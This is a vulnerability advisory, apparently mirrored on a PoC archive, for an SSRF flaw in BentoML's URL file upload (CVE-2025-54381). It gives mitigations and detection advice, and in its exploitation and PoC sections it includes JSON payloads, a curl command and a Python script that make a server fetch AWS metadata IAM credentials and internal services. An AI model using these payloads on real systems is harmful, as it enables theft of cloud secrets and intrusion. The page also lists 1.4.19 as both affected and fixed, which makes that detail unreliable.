关联漏洞
标题:BentoML 代码问题漏洞 (CVE-2025-54381)描述:BentoML是BentoML开源的一个开源模型服务库。用于使用 Python 构建高性能和可扩展的人工智能应用程序。 BentoML 1.4.0至1.4.19版本存在代码问题漏洞,该漏洞源于文件上传处理系统未验证用户提供的URL,可能导致服务端请求伪造攻击。
描述
CVE-2025-54381
介绍
# **🔓 CVE-2025-54381 – ⚠️ Critical SSRF Vulnerability in BentoML Allows 🚨 Unauthorized Internal & Cloud Metadata Access**
---
## 📛 CVE Information
* **CVE ID:** CVE-2025-54381
* **Published Date:** July 30, 2025
* **Discovered by:** Wiz Research Team
* **Reported to GitHub Advisory Database & NVD**
* **Severity:** Critical
* **CVSS v3.1 Score:** **9.9 / 10**
---
## 📦 Affected Software
* **Product:** [BentoML](https://github.com/bentoml/BentoML) (Python-based framework for packaging, shipping, and deploying ML models)
* **Affected Versions:**
* All versions from **1.4.0** up to and including **1.4.19**
---
## 🔍 Vulnerability Type
* **Type:** SSRF (Server-Side Request Forgery)
* **CWE Category:** CWE-918 – Server-Side Request Forgery
---
## ⚠️ Detailed Vulnerability Description
The vulnerability lies in the **URL-based file upload** feature in BentoML's model-serving APIs. Specifically, BentoML supports receiving file inputs via URLs in both:
1. **Multipart Form Requests**
2. **JSON POST Requests**
The framework then performs a **server-side HTTP GET request** to download the file **without properly validating the user-supplied URL**.
### What makes it dangerous?
The server can be tricked into:
* Accessing **internal-only services**, e.g. `http://localhost:...`, `http://127.0.0.1:...`
* Accessing **cloud metadata endpoints** like:
* `http://169.254.169.254/latest/meta-data/` (AWS)
* `http://metadata.google.internal/` (GCP)
* Accessing **internal IP ranges**:
* `10.0.0.0/8`, `172.16.0.0/12`, `192.168.0.0/16`
These endpoints may expose:
* IAM credentials
* Tokens
* Service secrets
* Private APIs
* Admin dashboards
---
## 💣 Impact
| Impact Area | Description |
| ----------------------- | ------------------------------------------ |
| **Confidentiality** | High — attacker may steal internal secrets |
| **Integrity** | Low — read-only attack |
| **Availability** | Low — unlikely to crash the system |
| **Scope** | Changed — attack may reach other systems |
| **Privileges Required** | None |
| **User Interaction** | None |
---
## 🧪 Exploitation Examples
### Example 1: Accessing AWS Metadata
```json
{
"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
}
```
If the server is hosted on AWS, this fetches sensitive IAM role credentials.
---
### Example 2: Internal Reconnaissance
```json
{
"url": "http://10.0.0.15:8080/admin"
}
```
The attacker could scan for internal services exposed only on the private network.
---
### Example 3: Localhost SSRF
```json
{
"url": "http://127.0.0.1:9000/metrics"
}
```
This may expose services like Prometheus, Grafana, MinIO, etc.
---
## 🔧 Fix & Mitigation
### ✅ Fixed in version 1.4.19
Patch introduces:
* URL scheme validation
* IP address checking
* Blocking requests to:
* localhost
* internal IP ranges
* metadata endpoints
* Additional safeguards for both JSON and multipart upload handlers
---
### 🧱 Temporary Mitigations
If you cannot upgrade:
1. **Add firewall rules** to block outbound traffic to internal networks and metadata endpoints.
2. **Use a proxy** with allowlists for outgoing requests.
3. **Implement URL filtering logic** before allowing downloads.
4. **Disable URL-based file upload** feature if not needed.
5. **Log all outbound requests** and monitor suspicious connections.
---
## 🧰 Detection
* Monitor logs for requests from BentoML to:
* `169.254.169.254`
* `127.0.0.1`
* `10.*.*.*`, `192.168.*.*`, etc.
* Use dynamic analysis tools (DAST) to fuzz file-upload endpoints with internal URLs.
* Check for unexpected `GET` requests made from your BentoML server to unauthorized endpoints.
---
## 🧪 Proof of Concept (PoC)
### Basic JSON Request Exploiting SSRF
```bash
curl -X POST http://<target>:3000/upload \
-H "Content-Type: application/json" \
-d '{"url": "http://169.254.169.254/latest/meta-data/"}'
```
### Python PoC
```python
import requests
url = "http://target-server/upload"
data = {"url": "http://169.254.169.254/latest/meta-data/"}
r = requests.post(url, json=data)
print(r.text)
```
---
## ✅ Recommended Actions for Security Teams
1. **Identify all BentoML deployments**
2. **Upgrade to 1.4.19 or later**
3. **Disable URL-based uploads** unless absolutely needed
4. **Apply egress filtering on server firewalls**
5. **Audit logs** for abnormal outbound HTTP traffic
6. **Conduct a code review** for any custom handlers using `requests.get()` or similar with user input
---
## 📚 Summary Table
| Key | Value |
| ----------------- | -------------------------------- |
| CVE ID | CVE-2025-54381 |
| Product | BentoML |
| Versions Affected | 1.4.0 – 1.4.19 |
| Vulnerability | SSRF |
| CVSS v3.1 Score | 9.9 (Critical) |
| Fixed Version | 1.4.19 |
| Exploitable by | Remote attacker (no auth needed) |
| Discovered by | Wiz Research |
---
## 🔒Disclaimer:
This content is provided **strictly for educational, ethical, and informational purposes only**. The goal is to raise awareness about CVE-2025-54381 and help developers and security professionals understand, detect, and remediate potential vulnerabilities in their systems.
**❌ Any unauthorized use of this information to exploit or harm systems without explicit permission is illegal and unethical.**
By proceeding, you agree to use this knowledge responsibly and in compliance with all applicable laws and ethical guidelines.
文件快照
[4.0K] /data/pocs/00a0809e34923d192be6512dbc10ada5578414b8
└── [5.8K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。